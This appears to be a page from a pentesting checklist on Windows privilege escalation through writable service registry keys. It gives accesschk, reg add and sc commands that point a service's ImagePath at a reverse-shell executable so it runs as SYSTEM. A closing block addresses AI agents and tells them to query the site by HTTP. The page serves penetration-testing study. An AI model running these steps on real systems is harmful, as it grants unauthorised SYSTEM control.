# Weak Registry Permissions ### Overview **Weak Registry Permissions** is a Windows local privilege escalation technique where a low-privileged user has write access to registry keys that control how a high-privileged service runs. Windows services store critical configuration in the registry, including: * Service executable path * Startup parameters * Service DLLs (for `svchost`) * Failure actions If these registry keys are **writable**, an attacker can modify them to execute **malicious code as SYSTEM** when the service starts. ### Why this Works Windows Service Control Manager (SCM): 1. Reads service configuration from: ``` HKLM\SYSTEM\CurrentControlSet\Services\ ``` 2. Uses values such as: * `ImagePath` * `Parameters\ServiceDll` 3. Launches the service using the configured account (often **LocalSystem**) If a low-privileged user can modify these values, SCM will **blindly trust the registry configuration**. Some of the commonly abused registry values is given below. | Registry Value | Purpose | | ---------------- | ------------------------------ | | `ImagePath` | Path to service executable | | `ServiceDll` | DLL loaded by svchost services | | `ObjectName` | Account the service runs as | | `FailureCommand` | Command executed on failure | | `Start` | Auto / Manual start | ### Prerequisites 1. Local Low-Privileged Access 2. Service Runs as High Privilege 3. Writable Registry Key or Value on `HKLM\SYSTEM\CurrentControlSet\Services\` 4. Ability to start/restart service. ### Steps 1. Confirm Service Privileges: ```bash sc qc ``` 2. Check if your user/group has RW/Full access on the registry value. ```bash # Check for "KEY_ALL_ACCESS" accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\ ``` 3. Modify registry path: ```bash reg add HKLM\SYSTEM\CurrentControlSet\services\ /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f ``` 4. Restart/Start Service ```bash sc stop sc start ``` {% hint style="info" %} Difference b/w modifying service registry VS modifying service via `sc config ` ? #### Q) How does `sc config` work internally 1. `sc.exe` talks to **Service Control Manager** 2. SCM checks the **service security descriptor** 3. Requires `SERVICE_CHANGE_CONFIG` 4. SCM updates the registry **on your behalf** `User → SCM → Registry` You need **service-level permissions**, such as: * `SERVICE_CHANGE_CONFIG` * `WRITE_DAC` * `FULL_CONTROL`
#### **Q) Direct Registry Modification (Bypass SCM)** 1. You write directly to the registry path. 2. SCM is **not involved** 3. SCM reads the value **later**, when starting the service You need **registry-level write access**, such as: * `Set Value` * `Write DAC` * `Full Control` {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/service-exploits/weak-registry-permissions.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.